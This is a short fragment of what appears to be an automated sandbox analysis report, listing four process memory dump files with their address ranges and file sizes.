                                                          • memory/3316-136-0x000000001D970000-0x000000001DA22000-memory.dmp
                                                            Filesize

                                                            712KB

                                                          • memory/3316-135-0x000000001D860000-0x000000001D8B0000-memory.dmp
                                                            Filesize

                                                            320KB

                                                          • memory/4696-174-0x000002CDA62E0000-0x000002CDA62E8000-memory.dmp
                                                            Filesize

                                                            32KB

                                                          • memory/4868-101-0x00000000004D0000-0x00000000007F4000-memory.dmp
                                                            Filesize

                                                            3.1MB